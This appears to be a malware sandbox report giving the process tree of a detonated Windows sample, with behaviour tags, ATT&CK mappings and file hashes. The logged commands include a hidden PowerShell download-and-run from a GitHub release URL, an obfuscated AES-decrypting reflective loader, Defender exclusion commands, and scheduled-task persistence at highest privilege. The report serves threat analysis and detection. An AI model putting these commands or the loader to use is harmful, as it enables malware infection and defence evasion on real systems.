C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1872 -
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x508 0x4ec2⤵PID:3920
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2292
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2328
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2588
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3344
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\cmd.execmd /c start /min "" powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/DSADSADSA/Powershell.bat' -OutFile \"$env:temp\Powershell.bat\"; Start-Process \"$env:temp\Powershell.bat\""3⤵
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/DSADSADSA/Powershell.bat' -OutFile \"$env:temp\Powershell.bat\"; Start-Process \"$env:temp\Powershell.bat\""4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Powershell.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Local\Temp\Powershell.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:1940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_896_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.vbs"7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.bat" "8⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "9⤵PID:3112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Users\Admin\AppData\Local\Temp\Stupido.exe"C:\Users\Admin\AppData\Local\Temp\Stupido.exe"10⤵
- Executes dropped EXE
PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\Payload.exe"C:\Users\Admin\AppData\Local\Temp\Payload.exe"10⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Payload.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4784 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:4692
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Payload.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Payload.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:512
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Payload" /tr "C:\Users\Admin\AppData\Roaming\Payload.exe"11⤵
- Scheduled Task/Job: Scheduled Task
PID:1600
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM explorer.exe11⤵
- Kills process with taskkill
PID:5032
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'10⤵
- Command and Scripting Interpreter: PowerShell
PID:1420
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\elgwjq.exe"' & exit10⤵PID:3744
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\elgwjq.exe"'11⤵PID:3968
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Local\Temp\Powershell.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('–ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\elgwjq.exe"'')); "12⤵PID:2460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden12⤵
- Command and Scripting Interpreter: PowerShell
PID:1344
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ikiddm.exe"' & exit10⤵PID:4768
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ikiddm.exe"'11⤵PID:4340
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Local\Temp\Powershell.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('–ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ikiddm.exe"'')); "12⤵PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden12⤵
- Command and Scripting Interpreter: PowerShell
PID:4952
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:1868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3916,i,7761714625659357865,10802238739796857379,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:81⤵PID:1260
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4920,i,7761714625659357865,10802238739796857379,262144 --variations-seed-version --mojo-platform-channel-handle=2808 /prefetch:81⤵PID:3476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:4452
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
2KB
MD5b8542c31d8908c7a5fa4359a9f753ec3
SHA1bb9646b9bf5e7a5b1c3b1adf296edbbd4a5449c9
SHA2561973f4ecae310d9bc7c129a2d6e5d0fa77939d2af90e411f9622410608c1c632
SHA512dce75e1027dd87771122c11abab626f8a4cedd4c8914b3c49ce4b564dbf48a1da67eea52bc1655ce4f665a20aa1466cd716700641337f04b6118f9c07205d031
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
944B
MD5e3161f4edbc9b963debe22e29658050b
SHA145dbf88dadafe5dd1cfee1e987c8a219d3208cdb
SHA2561359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a
SHA512006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2
-
Filesize
944B
MD5e60eb305a7b2d9907488068b7065abd3
SHA11643dd7f915ac50c75bc01c53d68c5dafb9ce28d
SHA256ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135
SHA51295c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b
-
Filesize
1KB
MD5d5a6408e58a8e6cdcac441b2724bdeea
SHA1c32347262903a5db5422c41c280fe975731155a1
SHA2566927aa1bd6f5b470b786b77ac7deac1ac4afcfa7650bc5c72358b3e8462e32d3
SHA512f630fa6616ed5aeb1c875f1573de5ca3db917ff6b2d5cb8d3da37ae9e45104a8ebf46b2504d1281b9d3b6705bbf3422c9b40c20b64417ef932c68b314e3aee14
-
Filesize
59KB
MD507ac8571846ca0cc9f6fcdbe1d000be2
SHA13cbe16f7d24d40b590f97b1999c64c5bb889e8c6
SHA2562a3bcea7cadf94c65d4462b2297285078f5232e84267dfa641cb23475ffdb1b5
SHA51256413d14e5ee2e615c19232d93047c9d2cc422e083eda0f9f5ae1dc04798989e73d5ad80e06a7dda166deb0177206fb1ed045773bba3975667c12409d67d1e7e
-
Filesize
457KB
MD50ffbfd7a95ae6bbe959b1ae1fc7477fd
SHA14aa50ea219154634845682a8f959c7d0e9a4c608
SHA256a914dd2a5ea2c98e706a7d2a6c4626b61fde1c078439b4e47fdd10f504dbcb7a
SHA51250cc626c219b425b70f77fff1cda8e4478652b4f7a167a52bf2c484a3000a99c7a9f745c79d9fc61a34257294f0c4e135157d073264e0c281de5d1867b0e42af
-
Filesize
47KB
MD528ea39d8afd092f7ac283d720c4ff07b
SHA174c3a8c13d8b5722be39a70e6fb91a4084ddab9f
SHA256af9d60ae6848565e34f1f4545f75ad894b0cb502f73216487190d95ecb86f282
SHA512a2329c29ed655e956beb6ed598134cd2058c46e611d112d1092fd1d603c146ab94215f33ae9f7502379d06c02a58b2ddc82577a18c175eb9bcc6404111a7a372
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
124B
MD5b40cf7dc4a604a18e93dab60d105348e
SHA15014d3c8083412b2ac51754595b2b6228313fda2
SHA256c0da9cbe086f9d69a4a881f53c3d0a13e7df8a6ea9776f35e14791c3778925ec
SHA5128c7a18f946cb75ea20a44b93681856d842911e1f9a3c79b876dbefeda20fdd09954043295f2e9018c5f283320e83ec6876614b04742a4471f96b980f7b4216b8
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5fbc387364a7e42faf51ceb60cc5baa41
SHA1549463825143c948cebeeb14fc19b0d1775b73d1
SHA256e70506593c025b198514981aa69176136b5eb505234f8e41f1905583a7d4d68a
SHA512c732eec5b7f7425b5b43bf7abefed4712fb0c1069cfc770910ad5931bcbedf3b5373a7ffd95fa89c7bf00cf49915e679782d88f3556e57c41128a31b31b0be75